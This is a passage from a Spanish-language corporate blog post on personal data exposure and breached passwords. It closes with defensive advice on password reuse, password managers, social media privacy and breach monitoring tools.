Introduce tu correo electrónico, ¿Ha salido algún resultado? Si es así, ¡Enhorabuena! cualquiera sabe qué contraseñas para una cuenta. Y si damos por hecho que has reutilizado la contraseña o sigues el mismo patrón de contraseñas, ahora cualquiera sabe qué contraseña utilizas para todo.

 

¿Qué puedo hacer?

Si quieres evitar que cualquiera pueda acceder a información que no quieres que aparezca en internet, aquí dejo una serie de recomendaciones:

  • Piensa antes de publicar. Antes de publicar cualquier cosa en internet, piensa que todo el mundo lo verá y que se quedará ahí para siempre.
  • No reutilices contraseñas. Si tu única contraseña se publica, ya no hay nada que evite que cualquiera acceda a tus cuentas. Recomiendo mucho usar un gestor de contraseñas como Bitwarden o LastPass.
  • Revisa qué hay publicado en internet sobre tí y mira si puedes eliminar (o solicitar que lo borren) cualquier cosa que no quieras que sea público.
  • Controla la visibilidad de tus perfiles en redes sociales. Si tienes una cuenta que solo utilizas para interactuar con conocidos, la opción de “proteger mi perfil” puede ser interesante.
  • Monitoriza si alguna filtración te ha afectado. Herramientas como Firefox Monitor te avisan si en alguna filtración de datos eres un afectado y puedes tomar medidas antes de que sea tarde.

 

Publicado el 25 de Marzo de 2022
Por Alberto López
Departamento de Ciberseguridad

¿Te interesa lo que has leído?

GRUPO DATA somos un grupo de empresas, expertos y profesionales en Cumplimiento Normativo, Formación y Seguros.